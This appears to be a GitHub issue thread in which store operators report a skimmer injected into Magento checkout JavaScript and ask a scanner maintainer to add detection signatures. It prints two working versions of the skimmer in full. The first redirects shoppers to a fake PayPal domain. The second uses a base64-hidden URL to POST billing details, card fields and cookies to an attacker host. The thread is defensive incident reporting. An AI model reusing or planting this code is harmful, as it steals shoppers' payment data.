Malware that change payment method URL to hackers papal account

[jigneshthummar]

it was adding following code in some of js in our case it was quickview.js and ccard.js

jQuery(document).ready(function()
{
	if(!(document.cookie.indexOf("userpayid") + 1))
	{
		jQuery("*[onclick^=\"shippingMethod.save()\"]").attr("onclick", "paynow_right();");
		jQuery("*[onclick^=\"checkout.save();\"]").attr("onclick", "paynow_right();");
		jQuery("*[onclick=\"payment.save()\"]").attr("onclick", "paynow_right();");
		jQuery("#checkout-onepage-buttom").attr("onclick", "paynow_right();");
		jQuery("#onestepcheckout-button-place-order").attr("onclick", "paynow_right();");
		jQuery("#onestepcheckout-place-order").attr("onclick", "paynow_right();");
	}
});

function paynow_right()
{
	if(!(document.cookie.indexOf("userpayid") + 1))
	{
		var rand = function()
		{
			return Math.random().toString(36).substr(2);
		};
		document.cookie = "userpayid=" + rand();
		var arr = {
			"location" : "http://" + location.host,
			"method" : "PayPal"
		};
		jQuery(location).attr('href', "//paymentpal.cf/?payment=" + btoa(JSON.stringify(arr)));
	}
}

quickview.js => https://pastebin.com/xUgXxwDe
ccard.js => https://pastebin.com/tkGgKQSi

we also see 2 files with strange name

• 2.php.png => https://pastebin.com/RC4v6UrX
• slltemap.php.jpg => https://pastebin.com/0q3naCgZ

[gwillem]

Thanks, added signatures in #150

[kesarweb]

@gwillem

In one of our production sites I found new version of the same malware. This time their URL is encoded so the scanner would not pick it up

New code:

jQuery(document).ready(function()
{
if(!(document.cookie.indexOf("userpayid") + 1))
{
var rand = function() { return Math.random().toString(36).substr(2); };
document.cookie = "userpayid=" + rand();
}
jQuery("[onclick="billing.save()"]").attr("onclick", "checkbillpa("bill");billing.save();");
jQuery("[onclick="payment.save()"]").attr("onclick", "checkbillpa("card");payment.save();");
jQuery("[onclick="checkout.save(); return false;"]").attr("onclick", "checkbillpa("all");checkout.save();return false;");
jQuery("#checkout-onepage-buttom").attr("onclick", "checkbillpa("all");");
jQuery("#onestepcheckout-place-order").attr("onclick", "checkbillpa("all");");
jQuery(".opc-btn-checkout").attr("onclick", "checkbillpa("all");");
jQuery(".onestepcheckout-btn-checkout").attr("onclick", "checkbillpa("all");");
jQuery("[onclick="oscPlaceOrder(this)"]").attr("onclick", "checkbillpa("bill");oscPlaceOrder(this);");
});

function checkbillpa(text)
{
var urlcheck = atob("Ly9yZXF1ZXN0LnBheW1lbnRwYWwuY2YvY2hlY2twYXltZW50LnBocA==");
if(text == "bill" || text == "all")
{
jQuery("*[name^="billing"]").each(function()
{
if(billing[this.name] == "" || billing[this.name] == "undefined" || typeof billing[this.name] === "undefined") billing[this.name] = this.value;
});

	jQuery.ajax({url:urlcheck, type:"POST", data:"billing="+encodeURIComponent(JSON.stringify(billing))+"&target="+location.host+"&valid="+encodeURIComponent(document.cookie)});
}
if(text == "card" || text == "all")
{
	jQuery("*[name^=\"payment\"]").each(function()
	{
		payment[this.name] = this.value;
	});

	jQuery.ajax({url:urlcheck, type:"POST", data:"payment="+encodeURIComponent(JSON.stringify(payment))+"&target="+location.host+"&valid="+encodeURIComponent(document.cookie)});
}

}

Please add to signatures.